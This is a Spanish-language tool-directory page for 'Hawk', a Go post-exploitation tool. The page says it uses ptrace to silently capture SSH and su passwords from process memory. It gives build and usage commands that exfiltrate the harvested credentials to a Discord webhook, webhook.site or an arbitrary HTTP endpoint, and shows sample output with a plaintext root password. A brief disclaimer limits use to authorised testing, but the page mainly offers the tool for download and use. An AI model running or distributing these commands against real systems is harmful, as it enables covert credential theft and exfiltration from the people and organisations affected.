Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Hawk — Herramienta en Golang diseñada para exfiltrar contraseñas encontradas a través de los servicios sshd y su | Kitploit
Herramientas/GitHubGitHub/prodefense/hawk
Ataques de ContraseñasExfiltración de DatosRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubprodefense/hawk

Hawk

Herramienta en Golang diseñada para exfiltrar contraseñas encontradas a través de los servicios sshd y su

Ver Repositorio
3863hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir



Hawk

Intercepta silenciosamente credenciales SSH y SU en tiempo real

Hawk monitorea los procesos sshd y su, extrayendo contraseñas de la memoria mediante ptrace sin modificar los procesos objetivo. Cero escrituras. Recolección de credenciales puramente de solo lectura.

Demo

Example

Cómo funciona

Hawk aprovecha el sistema de archivos /proc de Linux para descubrir procesos SSH y SU, luego usa ptrace para adjuntarse e interceptar llamadas al sistema. Cuando ocurre la autenticación por contraseña, lee la contraseña directamente de la memoria del proceso durante la llamada al sistema write() — completamente transparente para el proceso objetivo. Las credenciales se exfiltran mediante un webhook o se imprimen en stdout.

Análisis detallado: Blog Post

Compilación

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

Uso

Webhook de Discord

Hawk detecta automáticamente los webhooks de Discord y envía mensajes formateados:

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

Configuración: Crea un webhook en tu servidor de Discord siguiendo la guía de webhooks de Discord. Las credenciales aparecerán en tu canal formateadas con nombre de host, usuario y contraseña.

Webhooks genéricos

Para otros servicios de webhook (webhook.site, servidores personalizados, etc.):

root@kitploit:~
# HTTPS (detección automática)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# HTTPS automático si no se especifica protocolo
./hawk webhook.example.com/path

Modo stdout

¿Sin webhook? Las credenciales se imprimen en stdout:

root@kitploit:~
./hawk

Salida:

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

Requisitos

  • Sistema Linux con ptrace habilitado
  • Sistema de archivos /proc montado
  • Privilegios de root (requeridos para ptrace)

Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Úsala de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito para realizar pruebas.

Créditos

Inspirado en el trabajo de blendin en 3snake.

Descargar herramienta